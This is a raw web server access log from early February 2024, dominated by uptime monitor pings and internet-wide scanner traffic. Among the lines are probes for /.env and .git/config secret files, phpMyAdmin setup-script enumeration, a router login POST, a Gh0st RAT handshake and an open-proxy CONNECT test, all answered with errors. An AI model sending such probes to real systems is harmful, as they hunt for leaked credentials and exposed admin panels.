193.37.77.177 - - [04/Feb/2024:22:56:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [04/Feb/2024:22:57:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
146.19.24.23 - - [04/Feb/2024:22:57:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Feb/2024:22:58:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:22:59:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:00:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.145.54 - - [04/Feb/2024:23:00:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.54 - - [04/Feb/2024:23:00:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.54 - - [04/Feb/2024:23:00:34 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.145.54 - - [04/Feb/2024:23:00:34 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [04/Feb/2024:23:01:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.97.210.229 - - [04/Feb/2024:23:02:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Feb/2024:23:02:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:03:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:04:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:05:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:06:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:07:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:08:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.97.210.229 - - [04/Feb/2024:23:08:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
51.159.103.14 - - [04/Feb/2024:23:08:56 +0100] "HEAD / HTTP/1.1" 200 - "-" "curl/7.81.0"
51.159.103.14 - - [04/Feb/2024:23:08:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
51.159.103.14 - - [04/Feb/2024:23:08:59 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
94.236.193.137 - - [04/Feb/2024:23:09:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [04/Feb/2024:23:09:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.180.143.49 - - [04/Feb/2024:23:10:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.49 - - [04/Feb/2024:23:10:17 +0100] "GET /webfig/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [04/Feb/2024:23:10:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:11:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.234 - - [04/Feb/2024:23:12:29 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.84:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [04/Feb/2024:23:12:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:13:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:14:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.234 - - [04/Feb/2024:23:14:59 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.81:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
146.19.24.23 - - [04/Feb/2024:23:15:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
176.97.210.229 - - [04/Feb/2024:23:15:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Feb/2024:23:15:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:16:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:17:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.131.111.142 - - [04/Feb/2024:23:18:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Feb/2024:23:18:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:19:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:20:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.79.181.223 - - [04/Feb/2024:23:21:15 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Feb/2024:23:21:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:22:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:23:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:24:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:25:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:26:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:27:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:28:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:29:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:30:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:31:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:32:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:33:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:34:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.165.16.72 - - [04/Feb/2024:23:34:53 +0100] "\x03" 501 316 "-" "-"
212.91.246.72 - - [04/Feb/2024:23:35:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:36:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:37:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:38:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
157.254.236.32 - - [04/Feb/2024:23:38:55 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
212.91.246.72 - - [04/Feb/2024:23:39:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.164 - - [04/Feb/2024:23:39:46 +0100] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.164 - - [04/Feb/2024:23:39:46 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Feb/2024:23:40:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:41:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:42:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:43:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:44:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:45:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.142.236.43 - - [04/Feb/2024:23:45:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
185.142.236.43 - - [04/Feb/2024:23:45:46 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
185.142.236.43 - - [04/Feb/2024:23:45:47 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
185.142.236.43 - - [04/Feb/2024:23:45:48 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
185.142.236.43 - - [04/Feb/2024:23:45:50 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36"
212.91.246.72 - - [04/Feb/2024:23:46:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:47:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:48:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.240.205.34 - - [04/Feb/2024:23:48:45 +0100] "Gh0st\xad" 501 321 "-" "-"
167.248.133.127 - - [04/Feb/2024:23:49:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.127 - - [04/Feb/2024:23:49:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.127 - - [04/Feb/2024:23:49:31 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.248.133.127 - - [04/Feb/2024:23:49:31 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [04/Feb/2024:23:49:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:50:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:51:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:52:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:53:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:54:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.203.211.7 - - [04/Feb/2024:23:54:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
189.203.13.236 - - [04/Feb/2024:23:55:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [04/Feb/2024:23:55:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:56:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:57:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:58:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:23:59:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.97.210.229 - - [05/Feb/2024:00:02:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.216.71.4 - - [05/Feb/2024:00:04:33 +0100] "CONNECT pro.ip-api.com:443 HTTP/1.1" 405 344 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:02 +0100] "GET http://212.91.246.87:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:02 +0100] "GET http://212.91.246.87:80/phpmyadmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:02 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:03 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:03 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:03 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:03 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:03 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:03 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:03 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:03 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:03 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:04 +0100] "GET http://212.91.246.87:80/pma/scripts/setup.php HTTP/1.0" 404 326 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:04 +0100] "GET http://212.91.246.87:80/phpMyAdmin3/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:04 +0100] "GET http://212.91.246.87:80/myadmin/scripts/setup.php HTTP/1.0" 404 330 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:04 +0100] "GET http://212.91.246.87:80/MyAdmin/scripts/setup.php HTTP/1.0" 404 330 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:04 +0100] "GET http://212.91.246.87:80/PHPMYADMIN/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:04 +0100] "GET http://212.91.246.87:80/mysqladmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:05 +0100] "GET http://212.91.246.87:80/SQL/scripts/setup.php HTTP/1.0" 404 326 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:06 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:06 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:06 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:06 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:06 +0100] "GET http://212.91.246.87:80/admin/pma/scripts/setup.php HTTP/1.0" 404 332 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:06 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2/scripts/setup.php HTTP/1.0" 404 335 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:06 +0100] "GET http://212.91.246.87:80/web/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 337 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:06 +0100] "GET http://212.91.246.87:80/webadmin/scripts/setup.php HTTP/1.0" 404 331 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:07 +0100] "GET http://212.91.246.87:80/admin/scripts/setup.php HTTP/1.0" 404 328 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:07 +0100] "GET http://212.91.246.87:80/dbadmin/scripts/setup.php HTTP/1.0" 404 330 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:08 +0100] "GET http://212.91.246.87:80/mysql/scripts/setup.php HTTP/1.0" 404 328 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:09 +0100] "GET http://212.91.246.87:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:09 +0100] "GET http://212.91.246.87:80/phpma/scripts/setup.php HTTP/1.0" 404 328 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:09 +0100] "GET http://212.91.246.87:80/sqlweb/scripts/setup.php HTTP/1.0" 404 329 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:09 +0100] "GET http://212.91.246.87:80/webdb/scripts/setup.php HTTP/1.0" 404 328 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:09 +0100] "GET http://212.91.246.87:80/websql/scripts/setup.php HTTP/1.0" 404 329 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:09 +0100] "GET http://212.91.246.87:80/_phpMyAdmin/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:09 +0100] "GET http://212.91.246.87:80/php/scripts/setup.php HTTP/1.0" 404 326 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:09 +0100] "GET http://212.91.246.87:80/admin/phpmyadmin/scripts/setup.txt HTTP/1.0" 404 339 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:10 +0100] "GET http://212.91.246.87:80/db/scripts/setup.php HTTP/1.0" 404 325 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:10 +0100] "GET http://212.91.246.87:80/sqlmanager/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:10 +0100] "GET http://212.91.246.87:80/mysqlmanager/scripts/setup.php HTTP/1.0" 404 335 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:10 +0100] "GET http://212.91.246.87:80/phpmanager/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:12 +0100] "GET http://212.91.246.87:80/php-myadmin/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:12 +0100] "GET http://212.91.246.87:80/phpmy-admin/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
213.233.45.94 - - [05/Feb/2024:00:05:12 +0100] "GET http://212.91.246.87:80/mysql-admin/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
103.149.192.222 - - [05/Feb/2024:00:10:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
35.203.210.209 - - [05/Feb/2024:00:10:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
89.242.114.180 - - [05/Feb/2024:00:11:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
176.97.210.229 - - [05/Feb/2024:00:17:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.196.8.126 - - [05/Feb/2024:00:19:14 +0100] "GET /api/.git/config HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Linux; Android 4.3; SPH-L710 Build/JSS15J) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.99 Mobile Safari/537.36"
185.196.8.126 - - [05/Feb/2024:00:19:14 +0100] "GET /backup/.git/config HTTP/1.1" 404 323 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
185.196.8.126 - - [05/Feb/2024:00:19:14 +0100] "GET /bak/.git/config HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7"
185.196.8.126 - - [05/Feb/2024:00:19:14 +0100] "GET /git/.git/config HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 Edg/101.0.1210.39"
205.210.31.152 - - [05/Feb/2024:00:24:27 +0100] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.152 - - [05/Feb/2024:00:24:27 +0100] "\x16\x03\x01" 501 318 "-" "-"
146.19.24.23 - - [05/Feb/2024:00:26:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
192.241.216.30 - - [05/Feb/2024:00:37:17 +0100] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
192.241.216.30 - - [05/Feb/2024:00:37:36 +0100] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
192.241.216.30 - - [05/Feb/2024:00:37:50 +0100] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
192.241.216.30 - - [05/Feb/2024:00:37:52 +0100] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
192.241.216.30 - - [05/Feb/2024:00:37:53 +0100] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
146.19.24.23 - - [05/Feb/2024:00:37:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
205.210.31.49 - - [05/Feb/2024:00:38:10 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
192.241.216.30 - - [05/Feb/2024:00:38:44 +0100] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
192.241.216.30 - - [05/Feb/2024:00:38:56 +0100] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
192.241.216.30 - - [05/Feb/2024:00:39:12 +0100] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
192.241.216.30 - - [05/Feb/2024:00:39:17 +0100] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
192.241.216.30 - - [05/Feb/2024:00:39:33 +0100] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
